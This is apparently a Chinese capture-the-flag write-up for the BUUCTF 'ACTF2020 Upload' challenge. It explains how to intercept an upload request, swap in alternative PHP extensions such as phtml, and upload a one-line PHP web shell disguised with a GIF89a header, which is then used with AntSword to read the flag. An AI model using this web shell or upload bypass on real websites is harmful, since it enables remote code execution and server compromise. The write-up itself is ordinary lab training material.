buuctf web [ACTF2020 新生赛]Upload

明了但不明显的文件上传

传个试试

行,抓包吧,php格式不行,就先上传要求的格式:jpg、png、gif

抓到上传的包之后,再修改成我们想要的

常见的php格式绕过有:php,php3,php4,php5,phtml,pht

挨个试试

这是上个图片题上传的木马,没有改格式,让上传图片,最好加上(GIF89a)

一句话木马:GIF89a

<script language="php">eval($_POST['cmd']);</script>

上传成功,它也把保存的路径告诉你了

掏出蚁剑大宝贝梭哈就完了

flag

相关推荐
前端小趴菜0529 分钟前
React-React.memo-props比较机制
前端·javascript·react.js
摸鱼仙人~1 小时前
styled-components:现代React样式解决方案
前端·react.js·前端框架
sasaraku.2 小时前
serviceWorker缓存资源
前端
RadiumAg3 小时前
记一道有趣的面试题
前端·javascript
yangzhi_emo3 小时前
ES6笔记2
开发语言·前端·javascript
yanlele3 小时前
我用爬虫抓取了 25 年 5 月掘金热门面试文章
前端·javascript·面试
中微子5 小时前
React状态管理最佳实践
前端
烛阴5 小时前
void 0 的奥秘:解锁 JavaScript 中 undefined 的正确打开方式
前端·javascript
中微子5 小时前
JavaScript 事件与 React 合成事件完全指南:从入门到精通
前端
Hexene...5 小时前
【前端Vue】如何实现echarts图表根据父元素宽度自适应大小
前端·vue.js·echarts